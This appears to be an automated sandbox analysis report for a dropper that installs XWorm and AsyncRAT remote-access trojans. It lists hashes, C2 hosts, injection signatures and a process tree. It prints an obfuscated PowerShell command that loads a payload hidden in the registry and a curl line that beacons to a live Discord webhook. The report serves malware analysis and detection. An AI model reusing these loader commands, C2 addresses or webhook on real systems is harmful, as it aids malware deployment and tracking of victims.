Analysis
- max time kernel: 150s
- max time network: 17s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 22-06-2024 05:28
Static task: static1
Behavioral task: behavioral1
Sample: Dropper.exe
Resource: win7-20240221-en
General
- Target: Dropper.exe
- Size: 1.4MB
- MD5: afbd173e05ef8ddabbe10b90f93b6614
- SHA1: 718220c153e1eba3d978eb7d2eb884716797be9f
- SHA256: 9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e
- SHA512: 5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f
- SSDEEP: 12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB
Malware Config
Extracted: xworm
- politics-fiber.gl.at.ply.gg:47430
- Install_directory: %AppData%
- install_file: $77-scchost.exe
Extracted: asyncrat
- Default
- environmental-blank.gl.at.ply.gg:25944
- delay: 1
- install: true
- install_file: $77-aachost.exe
- install_folder: %AppData%
Signatures
- Detect Xworm Payload (2 IoCs)
  resource / yara_rule:
  - \Users\Admin\AppData\Local\Temp\$77-sdchost.exe: family_xworm
  - behavioral1/memory/3020-11-0x0000000000EF0000-0x0000000000F02000-memory.dmp: family_xworm
- Modifies security service (2 TTPs, 2 IoCs)
  Processes: svchost.exe
  description / ioc / process:
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP (svchost.exe)
  - Set value (data): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection (svchost.exe)
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes: powershell.EXE
  description / pid / process / target process:
  - PID 2472 created 436: 2472 powershell.EXE -> winlogon.exe
- Async RAT payload (1 IoCs)
  resource / yara_rule:
  - \Users\Admin\AppData\Local\Temp\$77-aachost.exe: family_asyncrat
- Executes dropped EXE (4 IoCs)
  pid / process:
  - 3020 $77-sdchost.exe
  - 2880 $77-aachost.exe
  - 2588 $77-penisballs.exe
  - 2476 $77-install.exe
- Loads dropped DLL (4 IoCs)
  pid / process:
  - 2928 Dropper.exe (4 entries)
- Drops file in System32 directory (1 IoCs)
  Processes: powershell.EXE
  description / ioc / process:
  - File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.EXE
  description / pid / process / target process:
  - PID 2472 set thread context of 2924: 2472 powershell.EXE -> dllhost.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies data under HKEY_USERS (2 IoCs)
  Processes: powershell.EXE
  description / ioc / process:
  - Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.EXE)
  - Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2080a20265c4da01 (powershell.EXE)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: powershell.EXE, dllhost.exe
  pid / process:
  - 2472 powershell.EXE (2 entries)
  - 2924 dllhost.exe (repeated for the remaining entries)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: $77-sdchost.exe, $77-penisballs.exe, powershell.EXE, dllhost.exe, svchost.exe
  description / pid / process:
  - Token: SeDebugPrivilege: 3020 $77-sdchost.exe
  - Token: SeDebugPrivilege: 2588 $77-penisballs.exe
  - Token: SeDebugPrivilege: 2472 powershell.EXE (2 entries)
  - Token: SeDebugPrivilege: 2924 dllhost.exe
  - Token: SeAuditPrivilege: 856 svchost.exe
- Suspicious use of WriteProcessMemory (62 IoCs)
  Processes: Dropper.exe, taskeng.exe, powershell.EXE, dllhost.exe
  description / pid / process / target process:
  - PID 2928 wrote to memory of 2856: 2928 Dropper.exe -> cmd.exe (4 entries)
  - PID 2928 wrote to memory of 3020: 2928 Dropper.exe -> $77-sdchost.exe (4 entries)
  - PID 2928 wrote to memory of 2880: 2928 Dropper.exe -> $77-aachost.exe (4 entries)
  - PID 2928 wrote to memory of 2588: 2928 Dropper.exe -> $77-penisballs.exe (4 entries)
  - PID 2928 wrote to memory of 2476: 2928 Dropper.exe -> $77-install.exe (7 entries)
  - PID 1356 wrote to memory of 2472: 1356 taskeng.exe -> powershell.EXE (3 entries)
  - PID 2472 wrote to memory of 2924: 2472 powershell.EXE -> dllhost.exe (9 entries)
  - PID 2924 wrote to memory of 436: 2924 dllhost.exe -> winlogon.exe
  - PID 2924 wrote to memory of 480: 2924 dllhost.exe -> services.exe
  - PID 2924 wrote to memory of 492: 2924 dllhost.exe -> lsass.exe
  - PID 2924 wrote to memory of 500: 2924 dllhost.exe -> lsm.exe
  - PID 2924 wrote to memory of 604: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 684: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 748: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 808: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 856: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 972: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 240: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 332: 2924 dllhost.exe -> spoolsv.exe
  - PID 2924 wrote to memory of 1076: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 1120: 2924 dllhost.exe -> taskhost.exe
  - PID 2924 wrote to memory of 1172: 2924 dllhost.exe -> Dwm.exe
  - PID 2924 wrote to memory of 1212: 2924 dllhost.exe -> Explorer.EXE
  - PID 2924 wrote to memory of 320: 2924 dllhost.exe -> DllHost.exe
  - PID 2924 wrote to memory of 1704: 2924 dllhost.exe -> svchost.exe
  - PID 2924 wrote to memory of 1808: 2924 dllhost.exe -> sppsvc.exe
  - PID 2924 wrote to memory of 2928: 2924 dllhost.exe -> Dropper.exe
  - PID 2924 wrote to memory of 2992: 2924 dllhost.exe -> conhost.exe
  - PID 2924 wrote to memory of 3020: 2924 dllhost.exe -> $77-sdchost.exe
  - PID 2924 wrote to memory of 2880: 2924 dllhost.exe -> $77-aachost.exe
  - PID 2924 wrote to memory of 2588: 2924 dllhost.exe -> $77-penisballs.exe
  - PID 2924 wrote to memory of 1356: 2924 dllhost.exe -> taskeng.exe
  - PID 2924 wrote to memory of 2472: 2924 dllhost.exe -> powershell.EXE
  - PID 2924 wrote to memory of 2500: 2924 dllhost.exe -> conhost.exe
Processes (indented by tree depth; signature tags listed per process)
- C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  - C:\Windows\System32\dllhost.exe
    command line: C:\Windows\System32\dllhost.exe /Processid:{2540b071-678a-448f-a4c1-5da0812adb47}
    tags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\system32\services.exe
  command line: C:\Windows\system32\services.exe
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k DcomLaunch
    - C:\Windows\system32\DllHost.exe
      command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k RPCSS
  - C:\Windows\System32\svchost.exe
    command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    tags: Modifies security service
  - C:\Windows\System32\svchost.exe
    command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    - C:\Windows\system32\Dwm.exe
      command line: "C:\Windows\system32\Dwm.exe"
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k netsvcs
    tags: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\taskeng.exe
      command line: taskeng.exe {1C6B3C81-4611-49D9-B94D-D59B9922CD68} S-1-5-18:NT AUTHORITY\System:Service:
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        tags: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k LocalService
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k NetworkService
  - C:\Windows\System32\spoolsv.exe
    command line: C:\Windows\System32\spoolsv.exe
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  - C:\Windows\system32\taskhost.exe
    command line: "taskhost.exe"
  - C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  - C:\Windows\system32\sppsvc.exe
    command line: C:\Windows\system32\sppsvc.exe
- C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe
- C:\Windows\system32\lsm.exe
  command line: C:\Windows\system32\lsm.exe
- C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    tags: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    - C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      tags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      tags: Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      tags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\$77-install.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
      tags: Executes dropped EXE
- C:\Windows\system32\conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe "-181336726890199196346993063320036088751165019595-209369799-1715889996-1778760264"
- C:\Windows\system32\conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe "1852589390-125910951910900645171815424201861272163744980079-10220039661107960434"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- \Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize: 66KB
  MD5: 499861c56b2368cb123c027336370b92
  SHA1: c018376876cc5906681502bdc4c313e9ce4bd6ad
  SHA256: 146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930
  SHA512: c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077
- \Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
- \Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize: 256KB
  MD5: 18f497deffe88b6b2cff336a277aface
  SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
- \Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize: 50KB
  MD5: 77a71f3a441aa3bf824967e52413bec5
  SHA1: c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
  SHA256: 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
  SHA512: 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
- memory/436-53-0x0000000000B70000-0x0000000000B95000-memory.dmp (Filesize: 148KB)
- memory/436-61-0x0000000000BA0000-0x0000000000BCB000-memory.dmp (Filesize: 172KB)
- memory/436-62-0x000007FEBF700000-0x000007FEBF710000-memory.dmp (Filesize: 64KB)
- memory/436-63-0x0000000037870000-0x0000000037880000-memory.dmp (Filesize: 64KB)
- memory/436-54-0x0000000000BA0000-0x0000000000BCB000-memory.dmp (Filesize: 172KB)
- memory/436-51-0x0000000000B70000-0x0000000000B95000-memory.dmp (Filesize: 148KB)
- memory/436-55-0x0000000000BA0000-0x0000000000BCB000-memory.dmp (Filesize: 172KB)
- memory/480-77-0x0000000037870000-0x0000000037880000-memory.dmp (Filesize: 64KB)
- memory/480-75-0x0000000000080000-0x00000000000AB000-memory.dmp (Filesize: 172KB)
- memory/480-76-0x000007FEBF700000-0x000007FEBF710000-memory.dmp (Filesize: 64KB)
- memory/480-69-0x0000000000080000-0x00000000000AB000-memory.dmp (Filesize: 172KB)
- memory/492-91-0x0000000037870000-0x0000000037880000-memory.dmp (Filesize: 64KB)
- memory/492-89-0x00000000001C0000-0x00000000001EB000-memory.dmp (Filesize: 172KB)
- memory/492-90-0x000007FEBF700000-0x000007FEBF710000-memory.dmp (Filesize: 64KB)
- memory/492-83-0x00000000001C0000-0x00000000001EB000-memory.dmp (Filesize: 172KB)
- memory/500-97-0x0000000000860000-0x000000000088B000-memory.dmp (Filesize: 172KB)
- memory/2472-35-0x0000000019F30000-0x000000001A212000-memory.dmp (Filesize: 2.9MB)
- memory/2472-38-0x0000000077830000-0x00000000779D9000-memory.dmp (Filesize: 1.7MB)
- memory/2472-36-0x0000000000A80000-0x0000000000A88000-memory.dmp (Filesize: 32KB)
- memory/2472-37-0x0000000019D80000-0x0000000019DAA000-memory.dmp (Filesize: 168KB)
- memory/2472-39-0x0000000077610000-0x000000007772F000-memory.dmp (Filesize: 1.1MB)
- memory/2588-27-0x0000000000200000-0x0000000000246000-memory.dmp (Filesize: 280KB)
- memory/2588-33-0x0000000000290000-0x0000000000296000-memory.dmp (Filesize: 24KB)
- memory/2880-19-0x00000000010F0000-0x0000000001106000-memory.dmp (Filesize: 88KB)
- memory/2924-41-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2924-40-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2924-43-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2924-47-0x0000000077610000-0x000000007772F000-memory.dmp (Filesize: 1.1MB)
- memory/2924-48-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2924-46-0x0000000077830000-0x00000000779D9000-memory.dmp (Filesize: 1.7MB)
- memory/2924-45-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2924-42-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/2928-0-0x0000000074A5E000-0x0000000074A5F000-memory.dmp (Filesize: 4KB)
- memory/2928-1-0x0000000000BA0000-0x0000000000D10000-memory.dmp (Filesize: 1.4MB)
- memory/2928-223-0x0000000074A5E000-0x0000000074A5F000-memory.dmp (Filesize: 4KB)
- memory/3020-11-0x0000000000EF0000-0x0000000000F02000-memory.dmp (Filesize: 72KB)